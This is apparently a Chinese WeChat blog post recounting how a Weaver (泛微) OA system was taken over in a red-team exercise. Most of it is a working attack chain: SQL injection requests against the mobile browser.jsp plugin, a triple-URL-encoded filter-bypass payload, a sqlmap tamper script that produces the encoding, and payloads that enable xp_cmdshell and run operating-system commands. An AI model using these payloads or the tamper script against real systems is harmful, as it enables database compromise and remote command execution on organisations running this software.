在某次攻防过程过,发现靶标是一个泛微OA,如何通过sql注入到拿下靶标,
过程还是曲折.
不是星标不推送文章了。
师傅也不想吧~
快把极梦C设置成星标吧。
POST /mobile/ /plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}
isDis=1&browserTypeId=269&keyword=a' union select 1,''+(SELECT @@VERSION)+'
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {{Hostname}}
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
#!/usr/bin/env python
"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
# URL encoding for all characters
def tamper(payload, **kwargs):
encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in payload])
encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in encoded_payload])
encoded_payload = ''.join(['%' + format(ord(c), 'x') for c in encoded_payload])
encoded_payload = encoded_payload.replace(' ', '%20')
return encoded_payload
1.开启xpcmdshell:
isDis=1&browserTypeId=1&keyword='EXEC sp_configure 'show advanced options',1 select'
sDis=1&browserTypeId=1&keyword='RECONFIGURE select'
isDis=1&browserTypeId=1&keyword='EXEC sp_configure 'xp_cmdshell',1 select'
2.执行命令
isDis=1&browserTypeId=1&keyword='exec master..xp_cmdshell 'ping dnslog' select'
上述也有自动化工具,可以github找一下.
原文始发于微信公众号(极梦C):攻防演练-硬啃靶标之泛微OA拿下靶标
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论